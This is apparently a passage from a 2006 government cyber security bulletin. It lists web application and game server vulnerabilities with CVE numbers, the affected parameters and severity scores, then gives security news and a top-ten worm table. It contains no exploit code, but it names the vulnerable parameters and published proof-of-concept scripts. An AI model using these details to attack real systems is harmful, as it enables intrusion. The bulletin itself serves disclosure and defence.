Secunia Advisory: SA19475, March 31, 2006

Reload
CMS

ReloadCMS 1.2.5

A vulnerability has been reported due to insufficient sanitization of the 'User-Agent' header field in an HTTP request before displaying, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

There is no exploit code required; however, a Proof of Concept exploit script, reloadcms_poc, has been published.

ReloadCMS HTML Injection

CVE-2006-1645

Not Available Security Focus, Bugtraq ID: 17353, April 2, 2006

SkinTech

X-Changer 0.2

SQL injection vulnerabilities have been reported in 'index.php' due to insufficient sanitization of the 'from,' 'into,' and 'id' parameters before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client; however, a Proof of Concept exploit has been published.

X-Changer SQL Injection

CVE-2006-1557

7 Secunia Advisory: SA19459, March 31, 2006

SoftBiz

Image Gallery 0

Multiple SQL injection vulnerabilities have been reported due to insufficient sanitization of user-supplied input before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client; however, Proof of Concept exploits have been published.

Softbiz Image Gallery Multiple SQL Injection
Not Available Security Focus, Bugtraq ID: 17339, March 31, 2006

v-creator.com

v-creator prior to 1.3-pre3

A vulnerability has been reported in 'VCEngine.php' due to an input validation error in the 'enrypt()' and 'decrypt()' functions, which could let a remote malicious user execute arbitrary shell commands.

Vulnerability has been fixed in version 1.3-pre3.

Vulnerability can be exploited via a web client.

V-creator Remote Shell Code Execution

CVE-2006-1599

7 Security Focus, Bugtraq ID: 17328, April 3, 2006

vscripts.pl

QLnews 1.2

Several vulnerabilities have been reported: a Cross-Site Scripting vulnerability was reported due to insufficient sanitization of the 'autorx' and 'newsx' parameters before using, which could let a remote malicious user execute arbitrary HTML and script code; and a vulnerability was reported in 'admin.php' due to insufficient sanitization of input passed to configuration parameters before storing in 'config.php' which could let a remote malicious user execute arbitrary php code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited with a web client.

QLnews Multiple Input Validation

CVE-2006-1575
CVE-2006-1576

7
(CVE-2006-1575)

7
(CVE-2006-1576)

Security Focus, Bugtraq ID: 17335, April 3, 2006

vscripts.pl

VBook 2.0

Multiple vulnerabilities have been reported: a Cross-Site Scripting vulnerability was reported due to insufficient sanitization of the 'autor,' 'email,' 'www,' 'temat,' and 'tresc' parameters before using, which could let a remote malicious user execute arbitrary HTML and script code; an SQL injection vulnerability was reported in 'index.php' due to insufficient sanitization of the 'x' parameter before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code; and a vulnerability was reported in 'config.php' due to insufficient sanitization of configuration parameters in 'admin.php' before storing, which could let a remote malicious user execute arbitrary PHP code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client.

VBook Input Validation

CVE-2006-1561
CVE-2006-1562
CVE-2006-1563

5.6
(CVE-2006-1561)

7
(CVE-2006-1562)

8
(CVE-2006-1563)

Secunia Advisory: SA19448, March 30, 2006

vscripts.pl

VNews 1.2

Multiple vulnerabilities have been reported: an SQL injection vulnerability was reported in 'admin/admin.php' due to insufficient sanitization of the 'loginvar' parameter, in 'news.php' due to insufficient sanitization of the 'news' parameter, and in 'news.php' due to insufficient sanitization of the 'nom' parameter, which could let a remote malicious user execute arbitrary SQL code; a Cross-Site Scripting vulnerability was reported in 'news.php' due to insufficient sanitization of the 'autorkomentarza' and 'tresckomentarza' parameters before using, which could let a remote malicious user execute arbitrary HTML and script code; and a vulnerability was reported in the administration section when editing variables in 'admin/config.php' before storing, which could let a remote malicious user arbitrary PHP code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client.

VNews Multiple Input Validation

CVE-2006-1543
CVE-2006-1544
CVE-2006-1545

7
(CVE-2006-1543)

2.3
(CVE-2006-1544)

6
(CVE-2006-1545)

Secunia Advisory: SA19435, March 30, 2006

VWar

VWar 1.3-1.5

A file include vulnerability was reported in 'get_header.php' due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary PHP code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, a Proof of Concept exploit script, VWar_1.5.0_R12.pl, has been published.

VWar Remote File Include

CVE-2006-1636

7 Security Focus, Bugtraq ID: 17358, April 3, 2006

VWar

VWar 1.5 & prior

A file include vulnerability has been reported in 'include/
functions_install.PHP' due to insufficient verification if the 'vwar_root' parameter before using to include files, which could let a remote malicious user execute arbitrary PHP code.

Updates available

Vulnerability can be exploited through a web client; however, a Proof of Concept exploit script, VWar_1.5.0_RCE.php, has been published.

Virtual War File Inclusion

CVE-2006-1503

5.6

Secunia Advisory: SA19438, March 29, 2006

Secunia Advisory: SA19438, April 4, 2006

WebAPP

WebAPP 0.9.9 .3.2

Cross-Site Scripting vulnerabilities have been reported due to insufficient sanitization of unspecified input before returning to the user, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client.

WebAPP Cross-Site Scripting

CVE-2006-1427

2.3

Secunia Advisory: SA19506, April 3, 2006

Websina

Bugzero 4.3.1

Several vulnerabilities have been reported: a Cross-Site Scripting vulnerability was reported due to insufficient sanitization of the 'msg' parameter in various scripts and in 'edit.jsp' due to insufficient sanitization of the 'entryld' parameter, which could let a remote malicious user execute arbitrary HTML and script code; and a Cross-Site Scripting vulnerability was reported in 'edit.jsp' due to insufficient sanitization of the 'projectld' parameter and in 'error.jsp' due to insufficient sanitization of the 'error' parameter, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client; however, a Proof of Concept exploits have been published.

Bugzero Multiple Cross-Site Scripting

CVE-2006-1580

4.7 Security Focus, Bugtraq ID: 17351, April 3, 2006

Wire Plastik Design

wpBlog 0.4

An SQL injection vulnerability has been reported in 'index.php' due to insufficient sanitization of the 'postid' parameter before using an SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client.

wpBlog SQL Injection

CVE-2006-1639

5.6 Secunia Advisory: SA19538, April 4, 2006

ZDaemon
X-Doom

ZDaemon 1.08.01, X-Doom VI 1.6.7

Several vulnerabilities have been reported: a buffer overflow vulnerability was reported in the 'is_client_wad_ok' function, which could let a remote malicious user execute arbitrary code; and a remote Denial of Service vulnerability was reported in the 'ZD_MissingPlayer(),' 'ZD_UseItem(),' and 'ZD_ValidClient()' functions when an invalid value is submitted.

No workaround or patch available at time of publishing.

A Proof of Concept exploit script, zdaebof.zip, has been published.

Zdaemon Remote Buffer Overflow & Denial of Service

CVE-2006-1592
CVE-2006-1593

7
(CVE-2006-1592)

2.3
(CVE-2006-1593)

Security Focus, Bugtraq ID: 17340, March 31, 2006


Wireless Trends & Vulnerabilities
This section contains wireless vulnerabilities, articles, and malicious code that has been identified during the current reporting period.
  • Security Worries Hang Up Mobile Plans: Based on concerns over IT security, research indicates that many companies are putting a hold on the introduction of new wireless technologies. A survey published by Symantec and the research arm of UK-based newsmaker The Economist, the threat of virus attacks, potential flaws in smart phone software and a lack of wireless network access controls have forced many enterprise firms to slow down their adoption of additional mobile applications and devices.
  • Municipal Wi-Fi Could Cause Headaches: According to the chief technology officer for AirDefense, the largest concern is the ability to compromise the security of the corporate local area network (LAN) regardless of how it is set up. "Even if you have a policy of no Wi-Fi [usage], suddenly Wi-Fi is available on the lamp pole outside."
  • 802.11w fills wireless security holes: New cryptographic algorithms have been introduced by IEEE 802.11i, the standard behind Wi-Fi Protected Access and WPA 2, that patch the holes in the original Wired Equivalent Privacy specification. Now, the 802.11w task group is looking at extending the protection beyond data to management frames, which perform the core operations of a network.
  • Spy program snoops on cell phones: New software that hides on cell phones and captures call logs and text messages is being sold as a way to monitor kids and spouses. But according to one security company, it is a Trojan horse. The FlexiSpy application captures call logs, text messages and mobile Internet activity, among other things.


General Trends
This section contains brief summaries and links to articles which discuss or present information pertinent to the cyber security community.
  • Multiple Buffer Overflow Vulnerabilities in RealNetworks, Inc.'s Products: US-CERT is aware of multiple vulnerabilities in RealNetworks, Inc.'s Products. Each of these vulnerabilities may result in a buffer overflow within RealPlayer that could allow a remote attacker execute arbitrary code.
  • US Takes Interest in DDoS Attacks: Senior levels of the US government are taking an interest in recent distributed Denial of Service (DDoS) attacks against the internet's domain name system. In recent months, there have been large-scale and ongoing attacks against several DNS infrastructure providers, using a newly discovered method that enables the bad guys to greatly amplify the amount of attack traffic they can throw at their targets.
  • Active Exploitation of Cross-site Scripting Vulnerability in eBay.com: US-CERT is aware of an active exploitation of a cross-site scripting vulnerability in the eBay website. Successful exploitation may either allow an attacker to obtain sensitive data from stored cookies or redirect auction viewers to phishing sites where further disclosure of login credentials or personal information can occur. US-CERT VU#808921
  • Hackers Serve Rootkits with Bagles: According to F-Secure, the latest Bagle.GE variant loads a kernel-mode driver to hide the processes and registry keys of itself and other Bagle-related malware from security scanners. The use of offensive rootkits in existing virus threats signals an aggressive push by attackers to get around existing anti-virus software and maintain a persistent and undetectable presence on infected machines.
  • Survey: Identity theft hits 3 percent: According to a study based on the National Crime Victimization Survey (NCVS), an estimated 3.1 percent of American households became victims of identity theft in 2004. The study, which surveyed 42,000 households, found the most likely families to suffer identity theft included those with a young head of household (18 to 24 years of age) and those in the highest income bracket (greater than $75,000 per year). Identity theft was identified as the unauthorized use or attempted use of existing credit cards, accounts such as checking or brokerage accounts, or the misuse of information to obtain new credit accounts or to commit crimes.
  • 0603-exploits.tgz: Packet Storm new exploits for March, 2006.
  • Vendors failing to secure applications: According to Alan Pallar, director of research for Sans, weak digital security in businesses helps hackers to fund criminal activity. Software application vendors are still failing to sell secure products and it is a problem that is leaving customers open to hacking attacks.


Viruses/Trojans

Top Ten Virus Threats

A list of high threat viruses, as reported to various anti-virus vendors and virus incident reporting organizations, has been ranked and categorized in the table below. For the purposes of collecting and collating data, infections involving multiple systems at a single location are considered a single infection. It is therefore possible that a virus has infected hundreds of machines but has only been counted once. With the number of viruses that appear each month, it is possible that a new virus will become widely distributed before the next edition of this publication. To limit the possibility of infection, readers are reminded to update their anti-virus packages as soon as updates become available. The table lists the viruses by ranking (number of sites affected), common virus name, type of virus code (i.e., boot, file, macro, multi-partite, script), trends (based on number of infections reported since last week), and approximate date first found.

Rank
Common Name
Type of Code
Trend
Date
Description
1 Netsky-P Win32 Worm
Stable
March 2004 A mass-mailing worm that uses its own SMTP engine to send itself to the email addresses it finds when scanning the hard drives and mapped drives. The worm also tries to spread through various file-sharing programs by copying itself into various shared folder.
2 Zafi-B Win32 Worm
Stable
June 2004 A mass-mailing worm that spreads via e-mail using several different languages, including English, Hungarian and Russian. When executed, the worm makes two copies of itself in the %System% directory with randomly generated file names.
3 Lovgate.w Win32 Worm
Stable
April 2004 A mass-mailing worm that propagates via by using MAPI as a reply to messages, by using an internal SMTP, by dropping copies of itself on network shares, and through peer-to-peer networks. Attempts to access all machines in the local area network.
4 Mytob.C Win32 Worm
Increase
March 2004 A mass-mailing worm with IRC backdoor functionality which can also infect computers vulnerable to the Windows LSASS (MS04-011) exploit. The worm will attempt to harvest email addresses from the local hard disk by scanning files.
5 Mytob-GH Win32 Worm
Slight Decrease
November 2005 A variant of the mass-mailing worm that disables security related programs and allows other to access the infected system. This version sends itself to email addresses harvested from the system, forging the sender’s address.
6 Nyxum-D Win32 Worm
New
March 2006 A mass-mailing worm that turns off anti-virus, deletes files, downloads code from the internet, and installs in the registry. This version also harvests emails addresses from the infected machine and uses its own emailing engine to forge the senders address.
7 Netsky-D Win32 Worm
Decrease
March 2004 A simplified variant of the Netsky mass-mailing worm in that it does not contain many of the text strings that were present in NetSky.C and it does not copy itself to shared folders. Netsky.D spreads itself in e-mails as an executable attachment only.
8 Mytob-BE Win32 Worm
Increase
June 2005 A slight variant of the mass-mailing worm that utilizes an IRC backdoor, LSASS vulnerability, and email to propagate. Harvesting addresses from the Windows address book, disabling antivirus, and modifying data.
9 Mytob-AS Win32 Worm
Decrease
June 2005 A slight variant of the mass-mailing worm that disables security related programs and processes, redirection various sites, and changing registry values. This version downloads code from the net and utilizes its own email engine.
10 Zafi-D Win32 Worm
Slight Decrease
December 2004 A mass-mailing worm that sends itself to email addresses gathered from the infected computer. The worm may also attempt to lower security settings, terminate processes, and open a back door on the compromised computer.

Table updated April 3, 2006

[back to top]

 

 

 

Last updated

Was this document helpful?  Yes  |  Somewhat  |  No

Back to Top